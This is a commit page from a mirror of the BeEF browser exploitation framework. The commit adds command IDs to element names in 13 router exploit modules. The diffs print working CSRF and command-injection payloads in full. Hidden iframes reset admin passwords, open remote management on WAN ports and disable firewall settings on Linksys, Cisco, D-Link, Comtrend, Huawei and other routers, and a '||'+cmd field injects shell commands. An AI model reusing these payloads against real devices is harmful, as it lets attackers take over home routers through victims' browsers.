Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add command_id to embedded iframe/img IDs for router exploits

Browse Source 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
This commit is contained in:
bcoles
2013-05-27 11:56:01 +09:30
parent ab7a62e8a4
commit 639d0611a6
13 changed files with 97 additions and 84 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/router/3com_officeconnect_cmd_exec/command.js
View File

@@ -9,8 +9,9 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var path = 'utility.cgi';
var cmd = '<%= @cmd %>';
var timeout = 15;
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
{'type':'hidden', 'name':'testType', 'value':'1'},
{'type':'hidden', 'name':'IP', 'value':'||'+cmd}
]);
@@ -18,9 +19,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(com_officeconnect_iframe);
document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

2
modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
View File

@@ -14,7 +14,7 @@ beef.execute(function() {
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'asmax_ar804gu';
img.id = 'asmax_ar804gu_<%= @command_id %>';
img.src = gateway+path+cmd;
document.body.appendChild(img);

18
modules/exploits/router/bt_home_hub_csrf/command.js
View File

@@ -6,21 +6,21 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
[{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}]);
var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(bt_home_hub_iframe);
document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

11
modules/exploits/router/cisco_e2400_csrf/command.js
View File

@@ -7,8 +7,9 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
{'type':'hidden', 'name':'change_action', 'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
{'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
]);
var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Firewall'},
{'type':'hidden', 'name':'change_action', 'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(cisco_e2400_iframe1);
document.body.removeChild(cisco_e2400_iframe2);
document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

17
modules/exploits/router/comtrend_ct5367_csrf/command.js
View File

@@ -6,12 +6,13 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
input.setAttribute('value', passwd);
form.appendChild(input);
ct5367_iframe2.contentWindow.document.body.appendChild(form);
ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
form.submit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

17
modules/exploits/router/comtrend_ct5624_csrf/command.js
View File

@@ -6,21 +6,22 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

7
modules/exploits/router/dlink_dir_615_csrf/command.js
View File

@@ -7,8 +7,9 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
[{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
{'type':'hidden', 'name':'apply', 'value':'Save Settings'},
{'type':'hidden', 'name':'admin_name', 'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dir615_iframe);
document.body.removeChild(dir615_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

9
modules/exploits/router/dlink_dsl500t_csrf/command.js
View File

@@ -6,9 +6,10 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dsl500t_iframe);
document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

13
modules/exploits/router/huawei_smartax_mt880/command.js
View File

@@ -5,19 +5,20 @@
//
beef.execute(function() {
var gateway = '<%= @base %>';
var gateway = '<%= @base %>';
var username = '<%= @username %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(huawei_smartax_mt880_iframe);
document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

10
modules/exploits/router/linksys_befsr41_csrf/command.js
View File

@@ -5,15 +5,17 @@
//
beef.execute(function() {
var timeout = 15;
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
var befsr41_iframe = beef.dom.createInvisibleIframe();
befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(befsr41_iframe);
document.body.removeChild(befsr41_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

11
modules/exploits/router/linksys_wrt54g2_csrf/command.js
View File

@@ -5,11 +5,12 @@
//
beef.execute(function() {
var port = '<%= @port %>';
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g2_iframe);
document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

34
modules/exploits/router/linksys_wrt54g_csrf/command.js
View File

@@ -5,31 +5,33 @@
//
beef.execute(function() {
var port = '<%= @port %>';
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[
{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g_iframe);
document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});

25
modules/exploits/router/virgin_superhub_csrf/command.js
View File

@@ -9,30 +9,31 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var timeout = 15;
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
]);
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(virgin_superhub_iframe1);
document.body.removeChild(virgin_superhub_iframe2);
document.body.removeChild(virgin_superhub_iframe3);
document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});